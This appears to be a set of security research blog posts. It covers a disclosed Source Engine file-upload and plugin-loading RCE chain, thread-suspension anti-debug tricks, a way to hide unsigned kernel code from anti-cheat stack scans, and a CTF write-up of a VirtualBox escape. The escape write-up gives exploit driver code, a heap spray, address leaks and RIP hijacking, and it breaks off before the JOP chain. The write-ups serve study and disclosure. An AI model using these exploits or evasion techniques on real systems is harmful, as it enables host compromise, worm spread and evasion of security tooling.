Bypassing the file extension check is a bit more tricky, so let’s look at the structure sent by SendFile called dataFragments_t:

typedef struct dataFragments_s
{
    FileHandle_t    file;                 // open file handle
    char            filename[260];        // filename
    char*           buffer;               // if NULL it's a file
    unsigned int    bytes;                // size in bytes
    unsigned int    bits;                 // size in bits
    unsigned int    transferID;           // only for files
    bool            isCompressed;         // true if data is bzip compressed
    unsigned int    nUncompressedSize;    // full size in bytes
    bool            isReplayDemo;         // if it's a file, is it a replay .dem file?
    int             numFragments;         // number of total fragments
    int             ackedFragments;       // number of fragments send & acknowledged
    int             pendingFragments;     // number of fragments send, but not acknowledged yet
} dataFragments_t;

The 260 bytes name buffer in dataFragments_t is used for the file name checks and filters, but is later copied and then truncated to 256 bytes after all the sanity checks thus removing our fake extension and activating the malicious extension:

Q_strncpy( rc->gamePath, gamePath, BufferSize /* BufferSize = 256 */ );

Using a file name such as ./././(...)/file.dll.txt (pad to max length with ./) would get truncated to ./././(...)/file.dll on the receiving end after checking if the file extension is valid. This also has the side effect that we can overwrite files as the file exists check is done before the file extension truncation.

Remote code execution

Using the aforementioned remote file inclusion, we can upload Source Engine config files which have the potential to execute arbitrary code. Using Procmon, I discovered that the game engine searches for the config file in both platform/cfg and swarm/cfg respectively:

procmon

We can simply upload a malicious plugin and config file to platform/cfg and hijack the server. This is due to the fact that the Source Engine server config has the capability to load plugins with the plugin_load command:

plugin_load addons/alien_swarm_exploit.dll

This will load our dynamic library into the game server application, granting arbitrary code execution. The only constraint is that the newmapsettings.cfg config file is only reloaded on map change, so you will have to wait till the end of a game.

Wormable demonstration

Since both of these exploits apply to both the server and the client, we can infect a server, which can infect all players, which can carry on the virus when playing other servers. This makes this exploit chain completely wormable and nothing but a complete shutdown of the game servers can fix it.

Timeline

  • [2020-05-12] Reported to Valve on HackerOne
  • [2020-05-13] Triaged by Valve: “Looking into it!”
  • [2020-08-03] Patched in beta branch
  • [2020-08-18] Patched in release

New year, new anti-debug: Don’t Thread On Me

By: jm
4 January 2021 at 23:00

With 2020 over, I’ll be releasing a bunch of new anti-debug methods that you most likely have never seen. To start off, we’ll take a look at two new methods, both relating to thread suspension. They aren’t the most revolutionary or useful, but I’m keeping the best for last.

Bypassing process freeze

This one is a cute little thread creation flag that Microsoft added into 19H1. Ever wondered why there is a hole in thread creation flags? Well, the hole has been filled with a flag that I’ll call THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE (I have no idea what it’s actually called) whose value is, naturally, 0x40.

To demonstrate what it does, I’ll show how PsSuspendProcess works:

NTSTATUS PsSuspendProcess(_EPROCESS* Process)
{
  const auto currentThread = KeGetCurrentThread();
  KeEnterCriticalRegionThread(currentThread);

  NTSTATUS status = STATUS_SUCCESS;
  if ( ExAcquireRundownProtection(&Process->RundownProtect) )
  {
    auto targetThread = PsGetNextProcessThread(Process, nullptr);
    while ( targetThread )
    {
      // Our flag in action
      if ( !targetThread->Tcb.MiscFlags.BypassProcessFreeze )
        PsSuspendThread(targetThread, nullptr);

      targetThread = PsGetNextProcessThread(Process, targetThread);
    }
    ExReleaseRundownProtection(&Process->RundownProtect);
  }
  else
    status = STATUS_PROCESS_IS_TERMINATING;

  if ( Process->Flags3.EnableThreadSuspendResumeLogging )
    EtwTiLogSuspendResumeProcess(status, Process, Process, 0);

  KeLeaveCriticalRegionThread(currentThread);
  return status;
}

So as you can see, NtSuspendProcess that calls PsSuspendProcess will simply ignore the thread with this flag. Another bonus is that the thread also doesn’t get suspended by NtDebugActiveProcess! As far as I know, there is no way to query or disable the flag once a thread has been created with it, so you can’t do much against it.

As far as its usefulness goes, I’d say this is just a nice little extra against dumping and causes confusion when you click suspend in Processhacker, and the process continues to chug on as if nothing happened.

Example

For example, here is a somewhat funny code that will keep printing I am running. I am sure that seeing this while reversing would cause a lot of confusion about why the hell one would suspend his own process.

#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE 0x40

NTSTATUS printer(void*) {
    while(true) {
        std::puts("I am running\n");
        Sleep(1000);
    }
    return STATUS_SUCCESS;
}

HANDLE handle;
NtCreateThreadEx(&handle, MAXIMUM_ALLOWED, nullptr, NtCurrentProcess(),
                 &printer, nullptr, THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE,
                 0, 0, 0, nullptr);

NtSuspendProcess(NtCurrentProcess());

Suspend me more

Continuing the trend of NtSuspendProcess being badly behaved, we’ll again abuse how it works to detect whether our process was suspended.

The trick lies in the fact that suspend count is a signed 8-bit value. Just like for the previous one, here’s some code to give you an understanding of the inner workings:

ULONG KeSuspendThread(_ETHREAD *Thread)
{
  auto irql = KeRaiseIrql(DISPATCH_LEVEL);
  KiAcquireKobjectLockSafe(&Thread->Tcb.SuspendEvent);

  auto oldSuspendCount = Thread->Tcb.SuspendCount;
  if ( oldSuspendCount == MAXIMUM_SUSPEND_COUNT ) // 127
  {
    _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
    KeLowerIrql(irql);
    ExRaiseStatus(STATUS_SUSPEND_COUNT_EXCEEDED);
  }

  auto prcb = KeGetCurrentPrcb();
  if ( KiSuspendThread(Thread, prcb) )
    ++Thread->Tcb.SuspendCount;

  _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
  KiExitDispatcher(prcb, 0, 1, 0, irql);
  return oldSuspendCount;
}

If you take a look at the first code sample with PsSuspendProcess it has no error checking and doesn’t care if you can’t suspend a thread anymore. So what happens when you call NtResumeProcess? It decrements the suspend count! All we need to do is max it out, and when someone decides to suspend and resume us, they’ll actually leave the count in a state it wasn’t previously in.

Example

The simple code below is rather effective:

  • Visual Studio - prevents it from pausing the process once attached.
  • WinDbg - gets detected on attach.
  • x64dbg - pause button becomes sketchy with error messages like “Program is not running” until you manually switch to the main thread.
  • ScyllaHide - older versions used NtSuspendProcess and caused it to be detected, but it was fixed once I reported it.
for(size_t i = 0; i < 128; ++i)
  NtSuspendThread(thread, nullptr);

while(true) {
  if(NtSuspendThread(thread, nullptr) != STATUS_SUSPEND_COUNT_EXCEEDED)
    std::puts("I was suspended\n");
  Sleep(1000);
}

Conclusion

If anything, I hope that this demonstrated that it’s best not to rely on NtSuspendProcess to work as well as you’d expect for tools dealing with potentially malicious or protected code. Hope you liked this post and expect more content to come out in the upcoming weeks.

Hiding execution of unsigned code in system threads

By: drew
12 January 2021 at 00:00

Anti-cheat development is, by nature, reactive; anti-cheats exist to respond to and thwart a videogame’s population of cheaters. For instance, a videogame with an exceedingly low amount of cheaters would have little need for an anti-cheat, while a videogame rife with cheaters would have a clear need for an anti-cheat. In order to catch cheaters, anti-cheats will employ as many methods as possible. Unfortunately, anti-cheats are not omniscient; they can not know of every single method or detection vector to catch cheaters. Likewise, the game hacks themselves must continue to discover new or unique methods in order to evade anti-cheats.

The Reactive Development Cycle of Game Hacking

This brings forth a reactive and continuous development cycle, for both the cheats and anti-cheats: the opposite party (cheat or anti-cheat) will employ a unique method to circumvent the adjacent party (anti-cheat or cheat) which, in response, will then do the same.

One such method employed by an increasing number of anti-cheats is to execute core anti-cheat functions from within the operating system’s kernel. A clear advantage over the alternative (i.e. usermode execution) is in the fact that, on Windows NT systems, the anti-cheat can selectively filter which processes are able to interact with the memory of the game process in which they are protecting, thus nullifying a plethora of methods used by game hacks.

In response to this, many (but not all) hack developers made (or are making) the decision to do the same; they too would, or will, execute their hack, either wholly or in part, from within the operating system’s kernel, thus nullifying what the anti-cheats had done.

Unlike with anti-cheats, however, this decision carries with it numerous concessions: namely, the fact that, for various reasons, it is most convenient (or it is only practical) to execute the hack as an unsigned kernel driver running without the kernel’s knowledge; the “driver” is typically a region of executable memory in the kernel’s address space and is never loaded or allocated by the kernel. In other words, it is a “manually-mapped” driver, loaded by a tool used by a game hack.

This ultimately provides anti-cheats with many opportunities to detect so-called “kernel-mode” or “ring 0” game hacks (noting that those terms are typically said with a marketable significance; they are literally used to market such game hacks, as if to imply robustness or security); if the anti-cheat can prove that the system is executing, or had executed, unsigned code, it can then potentially flag a user as being a cheater.

Analyzing a Thread’s Kernel Stack

One such method - the focus of this article, in fact - of detecting unsigned code execution in the kernel is to iterate each thread that is running in the system (optionally deciding to only iterate threads associated with the system process, i.e. system threads) and to initiate some kind of stack trace.

Bluntly, this allows the anti-cheat to quite effectively determine if a cheat were executing unsigned code. For example, some anti-cheats (e.g. BattlEye) will queue to each system thread an APC which will then initiate a stack trace. If the stack trace returns an instruction pointer that is not within the confines of any loaded kernel driver, the anti-cheat can then know that it may have encountered a system thread that is executing unsigned code. Furthermore, because it is a stack trace and not a direct sampling of the return instruction pointer, it would work quite reliably, even if a game hack were, for example, executing a spin-loop or continuous wait; the stack trace would always lead back to the unsigned code.

It is quite clear to any cheat developer that they can respond to this behavior by simply running their thread(s) with kernel APCs disabled, preventing delivery of such APCs and avoiding the detection vector. As is will be seen, however, this method does not entirely prevent detection of unsigned code execution.

(Copying Out, Then) Analyzing a Thread’s Kernel Stack

Certain anti-cheats - EasyAntiCheat, in particular - had a much more apt method of generating a pseudo-stacktrace: instead of generating a stack trace with a blockable APC, why not copy the contents of the thread’s kernel stack asynchronously? Continuing the reactive cheat-anti-cheat development cycle, EasyAntiCheat had opted to manually search for instances of nonpaged code pointers that may have been left behind as a result of system thread execution.

While the downsides of this method are debatable, the upside is quite clear: as long as the thread is making procedure calls (e.g. x86 call instruction) from within its own code, either to kernel routines or to its own, and regardless of its IRQL or if the thread is even running, its execution will leave behind detectable traces on its stack in the form of pointers to its own code which can be extracted and analyzed.

Callouts: Continuing The Reactive Development Cycle

Proposed is the “callout” method of system thread execution, born from the recognition that:

  1. A thread’s kernel stack, as identified by the kernel stack pointer in a thread’s ETHREAD object, can be analyzed asynchronously by a potential anti-cheat to detect traces of unsigned code execution; and that
  2. To be useful in most cases, a system thread must be able to make calls to most external NT kernel or executive procedures with little compromise.

The Life-cycle of the Callout Thread

The life-cycle of a callout thread is quite simple and can be used to demonstrate its implementation:

  • Before thread creation:
    • Allocate a non-paged stack to be loaded by the thread; the callout thread’s “real stack”
    • Allocate shellcode (ideally in executable memory not associated with the main driver module) which disables interrupts, preserves the old/kernel stack pointer (as it was on function entry), loads the real stack, and jumps to an initialization routine (the callout thread’s “bootstrap routine”)
    • Create a system thread (i.e. PsCreateSystemThread) whose start address points to the initialization shellcode
  • At thread entry (i.e. the bootstrap routine):
    • Preserve the stack pointer that had been given to the thread at thread entry (this must be given by the shellcode)
    • (Optionally) Iterate the thread’s old/kernel stack pointer, ceasing iteration at the stack base, eliminating any references/pointers to the initialization shellcode
    • (Optionally) Eliminate references to the initialization shellcode within the thread’s ETHREAD; for example, it may be worth changing the thread’s start address
    • (Optionally, but recommended) Free the memory containing the initialization shellcode, if it was allocated separately from the driver module
    • Proceed to thread execution

In clearer terms, the callout thread spends most of its time executing the driver’s unsigned code with interrupts disabled and with its own kernel stack - the real stack. It can also attempt to wipe any other traces of its execution which may have been present upon its creation.

The Usefulness of the Callout Thread

The callout thread must also be capable of executing most, if not all, NT kernel and executive procedures. As proposed, this is effectively impossible; the thread must run with interrupts disabled and with its own stack, thus creating an obvious problem as most procedures of interest would run at an IRQL <= DISPATCH_LEVEL. Furthermore, the NT IRQL model may be liable to ignore our setting of the interrupt flag, causing most routines to unpredictibly enter a deadlock or enable interrupts without our consent.

A mechanism to allow for a callout thread to invoke these routines of interest, the callout mechanism, is therefore used to:

  1. Provide a routine which can be used to conveniently invoke (“call out”) an external function; and in this routine,
  2. Load the thread’s original/kernel stack pointer;
  3. Copy function arguments on to the kernel thread’s stack from the real stack;
  4. Enable interrupts;
  5. Invoke the requested routine (within the same instruction boundary as when interrupts are enabled);
  6. Cleanly return from the routine without generating obvious stack traces (e.g. function pointers);
  7. Load the real stack pointer and disable the interrupt flag, and do so before returning to unsigned code; and
  8. Continue execution, preserving the function’s return value

While somewhat complicated, the callout mechanism can be achieved easily and, to a reasonable degree, portably, using two widely-available ROP gadgets from within the NT kernel.

The Usefulness of IRET(Q)

The constraint of needing to load a new stack pointer, interrupt flag, and interrupt pointer within an instruction boundary was immediately satisfied by the IRET instruction.

For those unfamiliar, the IRET (lit. “interrupt return”) instruction is intended to be used by an operating system or executive (here, the NT kernel) to return from an interrupt routine. To support the recognition of an interrupt from any mode of execution, and to generically resume to any mode of execution, the processor will need to (effectively) preserve the instruction pointer, stack pointer, CPL or privilege level (through the CS and SS selectors; and while they have a more general use-case, this is effectively what is preserved on most operating systems with a flat memory model), and RFLAGS register (as interrupts may be liable to modify certain flags).

To report this information to the OS interrupt handler, the CPU will, in a specific order:

  1. Push the SS (stack segment selector) register;
  2. Push the RSP (stack pointer) register;
  3. Push the RFLAGS (arithmetic/system flags) register;
  4. Push the CS (code segment selector) register;
  5. Push the RIP (instruction pointer) register; and, for some exception-class interrupts,
  6. Push an error code which may describe certain interrupt conditions (e.g. a page fault will know if the fault was caused by a non-present page, or if it were caused by a protection violation)

Note that the error code is not important to the CPU and must be accounted for by the interrupt handler. Each operation is an 8-byte push, meaning that, when the interrupt handler is invoked, the stack pointer will point to the preserved RIP (or error code) values.

It is hopefully obvious as to how, approximately, the IRET instruction would be implemented:

  1. Pop a value from the stack to retrieve the new instruction pointer (RIP)
  2. Pop a value from the stack to retrieve the new code segment selector (CS)
  3. Pop a value from the stack to retrieve the new arithmetic/system flags register (RFLAGS)
  4. Pop a value from the stack to retrieve the new stack pointer (RSP)
  5. Pop a value from the stack to retrieve the new stack segment selector (SS)

Or, as modeled as a series of pseudo-assembly instructions,

GENERIC_INTERRUPT:

;note that all push and pop operations are 8 bytes (64 bits) wide!
push ss
push rsp
push rflags
push cs
push rip ;return instruction pointer
;optionally, push a zero-extended 4-byte error code. any interrupt which pushes an error code must have its handler add 8 bytes to their instruction pointer before executing its IRET.

IRET:

pop rip ;pop return instruction pointer into RIP. do not treat this as a series of regular assembly instructions; treat it instead as CPU microcode!
pop cs
pop rflags
pop rsp
pop ss

The callout mechanism uses the IRET instruction to accomplish its constraints, as the desired RFLAGS (which holds the interrupt flag), instruction pointer, and stack pointer can be loaded by the instruction at the same time (within an instruction boundary).

ROP; Chaining It All Together

To reiterate, the callout routine uses IRET to change the instruction pointer, stack pointer, and interrupt flag within the same instruction boundary in order to jump to external procedures with the interrupt flag enabled. This must be done within an instruction boundary to prevent unfortunately-timed external interrupts from being received just before the external procedure call.

It, however, must also be able to return from the external procedure call without leaving unsigned code pointers on the kernel stack; furthermore, it must also not rely on unlikely/unaligned ROP gadgets (e.g. a cli;ret sequence) which may not exist on future NT kernel builds. Thus also required is an IRET instruction to be executed upon the routine’s completion.

It must be recognized that the nature of the IRET instruction is such that the return instruction pointer is located on the stack. However, it is also recognized that a new stack pointer is loaded. We can therefore use IRET to load the callout thread’s real stack, with the stack pointer pointing to the actual return address.

This eliminates the problem of code pointers being present in the kernel stack; the return address back to our thread’s execution is located on another stack loaded by IRET and which isn’t obviously visible on a stack trace. To facilitate this, the stack frame loaded by the IRET gadget must be such that the return instruction pointer simply contains a RET instruction.

So, the ideal stack frame when calling an external procedure is as such:

  1. IRET return data, where the return address is a RET instruction within ntoskrnl.exe (or any region of signed code), and where the stack pointer to load is the thread’s real stack; which would have a return address pushed on to it; and
  2. The address of an IRET instruction within a region of signed code

Within most, if not all, versions of ntoskrnl.exe, this can be achieved with a simple RET instruction (0xC3 byte); along with the following gadget:

mov rsp, rbp
mov rbp, [rbp + some_offset] ;where some_offset could be liable to change
add rsp, some_other_offset
iretq

This also slightly modifies the mechanism of the ROP chain in that it must also load a pointer to the desired IRET frame in RBP when calling the function. Thankfully, the x64 calling convention specifies the RBP register as non-volatile, or unchanging across function calls, meaning that we can initialize it with our desired pointer when invoking the external procedure. It also means that the callout mechanism is permitted to allocate a non-paged region of memory to be given in RBP; preventing it from having to keep an IRET frame on the kernel stack. This notes, of course, the potential for an awful race condition where an interrupt is received in between the mov rsp, rbp and iretq instructions; the stack pointer value may point to memory that is insufficient to use for stack operations.

In having the external procedure return to the above IRET gadget, we can easily return to our unsigned code without ever leaking unsigned code pointers on the kernel stack.

Implementation

An example implementation of the callout mechanism can be found here.

Escaping VirtualBox 6.1: Part 1

14 January 2021 at 23:00

This post is about a VirtualBox escape for the latest currently available version (VirtualBox 6.1.16 on Windows). The vulnerabilities were discovered and exploited by our team Sauercl0ud as part of the RealWorld CTF 2020/2021.

The vulnerability was known to the organizers, requires the guest to be able to insert kernel modules and isn’t exploitable on default configurations of VirtualBox so the impact is very limited.

Many thanks to the organizers for hosting this great competition, especially to ChenNan for creating this challenge, M4x for always being helpful, answering our questions and sitting with us through the many demo attempts and of course all the people involved in writing the exploit.

Let’s get to some pwning :D

Discovering the Vulnerability

The challenge description already hints at where a bug might be:

Goal:

Please escape VirtualBox and spawn a calc(“C:\Windows\System32\calc.exe”) on the host operating system.

You have the full permissions of the guest operating system and can do anything in the guest, including loading drivers, etc.

But you can’t do anything in the host, including modifying the guest configuration file, etc.

Hint: SCSI controller is enabled and marked as bootable.

Environment:

In order to ensure a clean environment, we use virtual machine nesting to build the environment. The details are as follows:

  • VirtualBox:6.1.16-140961-Win_x64.
  • Host: Windows10_20H2_x64 Virtual machine in Vmware_16.1.0_x64.
  • Guest: Windows7_sp1_x64 Virtual machine in VirtualBox_6.1.16_x64.

The only special thing about the VM is that the SCSI driver is loaded and marked bootable so that’s the place for us to start looking for vulnerabilities.

Here are the operations the SCSI device supports:

// /src/VBox/Devices/Storage/DevBusLogic.cpp
    
    // [...]

    if (fBootable)
    {
        /* Register I/O port space for BIOS access. */
        rc = PDMDevHlpIoPortCreateExAndMap(pDevIns, BUSLOGIC_BIOS_IO_PORT, 4 /*cPorts*/, 0 /*fFlags*/,
                                           buslogicR3BiosIoPortWrite,       // Write a byte
                                           buslogicR3BiosIoPortRead,        // Read a byte
                                           buslogicR3BiosIoPortWriteStr,    // Write a string
                                           buslogicR3BiosIoPortReadStr,     // Read a string
                                           NULL /*pvUser*/,
                                           "BusLogic BIOS" , NULL /*paExtDesc*/, &pThis->hIoPortsBios);
        // [...]
    }
    // [...]

The SCSI device implements a simple state machine with a global heap allocated buffer. When initiating the state machine, we can set the buffer size and the state machine will set a global buffer pointer to point to the start of said buffer. From there on, we can either read one or more bytes, or write one or more bytes. Every read/write operation will advance the buffer pointer. This means that after reading a byte from the buffer, we can’t write that same byte and vice versa, because the buffer pointer has already been advanced.

While auditing the vboxscsiReadString function, tsuro and spq found something interesting:

// src/VBox/Devices/Storage/VBoxSCSI.cpp

/**
 * @retval VINF_SUCCESS
 */
int vboxscsiReadString(PPDMDEVINS pDevIns, PVBOXSCSI pVBoxSCSI, uint8_t iRegister,
                       uint8_t *pbDst, uint32_t *pcTransfers, unsigned cb)
{
    RT_NOREF(pDevIns);
    LogFlowFunc(("pDevIns=%#p pVBoxSCSI=%#p iRegister=%d cTransfers=%u cb=%u\n",
                 pDevIns, pVBoxSCSI, iRegister, *pcTransfers, cb));

    /*
     * Check preconditions, fall back to non-string I/O handler.
     */
    Assert(*pcTransfers > 0);

    /* Read string only valid for data in register. */
    AssertMsgReturn(iRegister == 1, ("Hey! Only register 1 can be read from with string!\n"), VINF_SUCCESS);

    /* Accesses without a valid buffer will be ignored. */
    AssertReturn(pVBoxSCSI->pbBuf, VINF_SUCCESS);

    /* Check state. */
    AssertReturn(pVBoxSCSI->enmState == VBOXSCSISTATE_COMMAND_READY, VINF_SUCCESS);
    Assert(!pVBoxSCSI->fBusy);

    RTCritSectEnter(&pVBoxSCSI->CritSect);
    /*
     * Also ignore attempts to read more data than is available.
     */
    uint32_t cbTransfer = *pcTransfers * cb;
    if (pVBoxSCSI->cbBufLeft > 0)
    {
        Assert(cbTransfer <= pVBoxSCSI->cbBuf);     // --- [1] ---
        if (cbTransfer > pVBoxSCSI->cbBuf)
        {
            memset(pbDst + pVBoxSCSI->cbBuf, 0xff, cbTransfer - pVBoxSCSI->cbBuf);
            cbTransfer = pVBoxSCSI->cbBuf;  /* Ignore excess data (not supposed to happen). */
        }

        /* Copy the data and adance the buffer position. */
        memcpy(pbDst, 
               pVBoxSCSI->pbBuf + pVBoxSCSI->iBuf,  // --- [2] ---
               cbTransfer);

        /* Advance current buffer position. */
        pVBoxSCSI->iBuf      += cbTransfer;
        pVBoxSCSI->cbBufLeft -= cbTransfer;         // --- [3] ---

        /* When the guest reads the last byte from the data in buffer, clear
           everything and reset command buffer. */

        if (pVBoxSCSI->cbBufLeft == 0)              // --- [4] ---
            vboxscsiReset(pVBoxSCSI, false /*fEverything*/);
    }
    else
    {
        AssertFailed();
        memset(pbDst, 0, cbTransfer);
    }
    *pcTransfers = 0;
    RTCritSectLeave(&pVBoxSCSI->CritSect);

    return VINF_SUCCESS;
}

We can fully control cbTransfer in this function. The function initially makes sure that we’re not trying to read more than the buffer size [1]. Then, it copies cbTransfer bytes from the global buffer into another buffer [2], which will be sent to the guest driver. Finally, cbTransfer bytes get subtracted from the remaining size of the buffer [3] and if that remaining size hits zero, it will reset the SCSI device and require the user to reinitiate the machine state, before reading any more bytes.

So much for the logic, but what’s the issue here? There is a check at [1] that ensures no single read operation reads more than the buffer’s size. But this is the wrong check. It should verify, that no single read can read more than the buffer has left. Let’s say we allocate a buffer with a size of 40 bytes. Now we call this function to read 39 bytes. This will advance the buffer pointer to point to the 40th byte. Now we call the function again and tell it to read 2 more bytes. The check in [1] won’t bail out, since 2 is less than the buffer size of 40, however we will have read 41 bytes in total. Additionally, this will cause the subtraction in [3] to underflow and cbBufLeft will be set to UINT32_MAX-1. This same cbBufLeft will be checked when doing write operations and since it is very large now, we’ll be able to also write bytes that are outside of our buffer.

Getting OOB read/write

We understand the vulnerability, so it’s time to develop a driver to exploit it. Ironically enough, the “getting a driver to build” part was actually one of the hardest (and most annoying) parts of the exploit development. malle got to building VirtualBox from source in order for us to have symbols and a debuggable process while 0x4d5a came up with the idea of using the HEVD driver as a base for us to work with, since it does some similar things to what we need. Now let’s finally start writing some code.

Here’s how we triggered the bug:

void exploit() {
    static const uint8_t cdb[1] = {0};
    static const short port = 0x434;
    static const uint32_t buffer_size = 1024;

    // reset the state machine
    __outbyte(port+3, 0);

    // initiate a write operation
    __outbyte(port+0, 0); // TargetDevice (0)
    __outbyte(port+0, 1); // direction (to device)
    
    __outbyte(port+0, ((buffer_size >> 12) & 0xf0) | (sizeof(cdb) & 0xf)); // buffer length hi & cdb length
    __outbyte(port+0, buffer_size);                                        // bugger length low
    __outbyte(port+0, buffer_size >> 8);                                   // buffer length mid
    
    for(int i = 0; i < sizeof(cdb); i++)
        __outbyte(port+0, cdb[i]);


    // move the buffer pointer to 8 byte after the buffer and the remaining bytes to -8
    char buf[buffer_size];
    __inbytestring(port+1, buf, buffer_size - 1)    // Read bufsize-1
    __inbytestring(port+1, buf, 9)                  // Read 9 more bytes

    for(int i = 0; i < sizeof(buf); i += 4)
        *((uint32_t*)(&buf[i])) = 0xdeadbeef
    for(int i = 0; i < 10000; i++)
        __outbytestring(port+1, buf, sizeof(buf))
}

The driver first has to initiate the SCSI state machine with a bufsize. Then we read bufsize-1 bytes and then we read 9 bytes. We chose 9 instead of 2 byte in order to have the buffer pointer 8 byte aligned after the overflow. Finally, we overwrite the next 10000kb after our allocated buffer+8 with 0xdeadbeef.

After loading this driver in the win7 guest, this is what we get:

As expected, the VM crashes because we corrupted the heap. Now we know that our OOB read/write works and since working with drivers was annoying, we decided to modify the driver one last time to expose the vulnerability to user-space. The driver was modified to accept this Req struct via an IOCTL:

enum operations {
    OPERATION_OUTBYTE = 0,
    OPERATION_INBYTE = 1,
    OPERATION_OUTSTR = 2,
    OPERATION_INSTR = 3,
};

typedef struct {
    volatile unsigned int port;
    volatile unsigned int operation;
    volatile unsigned int data_byte_out;
} Req;

This enables us to use the driver as a bridge to communicate with the SCSI device from any user-space program. This makes exploit prototyping a whole lot faster and has the added benefit of removing the need to touch Windows drivers ever again (well, for the rest of this exploit anyway :D).

The bug gives us a liner heap OOB read/write primitive. Our goal is to get from here to arbitrary code execution so let’s put this bug to use!

Leaking vboxc.dll and heap addresses

We’re able to dump heap data using our OOB read but we’re still far from code execution. This is a good point to start leaking addresses. The least we’ll require for nice exploitation is a code leak (i.e. leaking the address of any dll in order to get access to gadgets) and a heap address leak to facilitate any post exploitation we might want to do.

This calls for a heap spray to get some desired objects after our leak object to read their pointers. We’d like the objects we spray to tick the following boxes:

  1. Contains a pointer into a dll
  2. Contains a heap address
  3. (Contains some kind of function pointer which might get useful later on)

After going through some options, we eventually opted for an HGCMMsgCall spray. Here’s it’s (stripped down) structure. It’s pretty big so I removed any parts that we don’t care about:

class HGCMMsgCall: public HGCMMsgHeader
{
    // A list of parameters including a 
    // char[] with controlled contents
    VBOXHGCMSVCPARM *paParms;
    
    // [...]
};

class HGCMMsgHeader: public HGCMMsgCore
{
    public:
        // [...]
        /* Port to be informed on message completion. */
        PPDMIHGCMPORT pHGCMPort;
};

typedef struct PDMIHGCMPORT
{
    // [...]
    /**
     * Checks if @a pCmd was cancelled.
     *
     * @returns true if cancelled, false if not.
     * @param   pInterface          Pointer to this interface.
     * @param   pCmd                The command we're checking on.
     */
    DECLR3CALLBACKMEMBER(bool, pfnIsCmdCancelled,(PPDMIHGCMPORT pInterface, PVBOXHGCMCMD pCmd));
    // [...]

} PDMIHGCMPORT;

class HGCMMsgCore : public HGCMReferencedObject
{
    private:
        // [...]
        /** Next element in a message queue. */
        HGCMMsgCore *m_pNext;
        /** Previous element in a message queue.
         *  @todo seems not necessary. */
        HGCMMsgCore *m_pPrev;
        // [...]
};

It contains a VTable pointer, two heap pointers (m_pNext and m_pPrev) because HGCMMsgCall objects are managed in a doubly linked list and it has a callback function pointer in m_pfnCallback so HGCMMsgCall definitely fits the bill for a good spray target. Another nice thing is that we’re able to call the pHGCMPort->pfnIsCmdCancelled pointer at any point we like. This works because this pointer gets invoked on all the already allocated messages, whenever a new message is created. HGCMMsgCall’s size is 0x70, so we’ll have to initiate the SCSI state machine with the same size to ensure our buffer gets allocated in the same heap region as our sprayed objects.

Conveniently enough, niklasb has already prepared a function we can borrow to spray HGCMMsgCall objects.

Calling niklas’ wait_prop function will allocate a HGCMMsgCall object with a controlled pszPatterns field. This char array is very useful because it is referenced by the sprayed objects and can be easily identified on the heap.

Spraying on a Low-fragmentation Heap can be a little tricky but after some trial and error we got to the following spray strategy:

  1. We iterate 64 times
  2. Each time we create a client and spray 16 HGCMMsgCalls

That way, we seemed to reliably get a bunch of the HGCMMsgCalls ahead of our leak object which allows us to read and write their fields.

First things first: getting the code leak is simple enough. All we have to do is to read heap memory until we find something that matches the structure of one of our HGCMMsgCall and read the first quad-word of said object. The VTable points into VBoxC.dll so we can use this leak to calculate the base address of VBoxC.dll for future use.

Getting the heap leak is not as straight forward. We can easily read the m_pNext or m_pPrev fields to get a pointer to some other HGCMMsgCall object but we don’t have any clue about where that object is located relatively to our current buffer position. So reading m_pNext and m_pPrev of one object is useless… But what if we did the same for a second object? Maybe you can already see where this is going. Since these objects are organized in a doubly linked list, we can abuse some of their properties to match an object A to it’s next neighbor B.

This works because of this property:

addr(B) - addr(A) == A->m_pNext - B->m_pPrev

To get the address of B, we have to do the following:

  1. Read object A and save the pointers
  2. Take note of how many bytes we had to read until we found the next object B in a variable x
  3. Read object B and save the pointers
  4. If A->m_pNext - B->m_pPrev == x we most likely found the right neighbor and know that B is at A->m_pNext. If not, we just keep reading objects

This is pretty fast and works somewhat reliably. Equipped with our heap address and VBoxC.dll base address leak, we can move on to hijacking the execution flow.

Getting RIP control

Remember those pfnIsCmdCancelled callbacks? Those will make for a very short “Getting RIP control” section… :P

There’s really not that much to this part of the exploit. We only have to read heap data until we find another one of our HGCMMsgCalls and overwrite m_pfnCallback. As soon as a new message gets allocated, this method is called on our corrupted object with a malicious pHgcmPort->pfnIsCmdCancelled field.

/**
 * @interface_method_impl{VBOXHGCMSVCHELPERS,pfnIsCallCancelled}
 */
/* static */ DECLCALLBACK(bool) HGCMService::svcHlpIsCallCancelled(VBOXHGCMCALLHANDLE callHandle)
{
    HGCMMsgHeader *pMsgHdr = (HGCMMsgHeader *)callHandle;
    AssertPtrReturn(pMsgHdr, false);

    PVBOXHGCMCMD pCmd = pMsgHdr->pCmd;
    AssertPtrReturn(pCmd, false);

    PPDMIHGCMPORT pHgcmPort = pMsgHdr->pHGCMPort;   // We corrupted pHGCMPort
    AssertPtrReturn(pHgcmPort, false);

    return pHgcmPort->pfnIsCmdCancelled(pHgcmPort, pCmd);   // --- Profit ---
}

Internally, svcHlpIsCallCancelled will load pHgcmPort into r8 and execute a jmp [r8+0x10] instruction. Here’s what happens if we corrupt m_pfnCallback with 0x0000000041414141:

Code execution

At this point, we are able to redirect code execution to anywhere we want. But where do we want to redirect it to? Oftentimes getting RIP control is already enough to solve CTF pwnables. Glibc has these one-gadgets which are basically addresses you jump to, that will instantly give you a shell. But sadly there is no leak-kernel32dll-set-rcx-to-calc-and-call-WinExec one-gadget in VBoxC.dll which means we’ll have to get a little creative once more. ROP is not an option because we don’t have stack control so the only thing left is JOP(Jump-Oriented-Programming).

JOP requires some kind of register control, but at the point at which our callback is invoked we only control a single register, r8. An additional constraint is that since we only leaked a pointer from VBoxC.dll we’re limited to JOP gadgets within that library. Our goal for this JOP chain is to perform a stack pivot into some memory on the heap where we will place a ROP chain that will do the heavy lifting and eventually pop a calc.

Sounds easy enough, let’s see what we can come up with :P

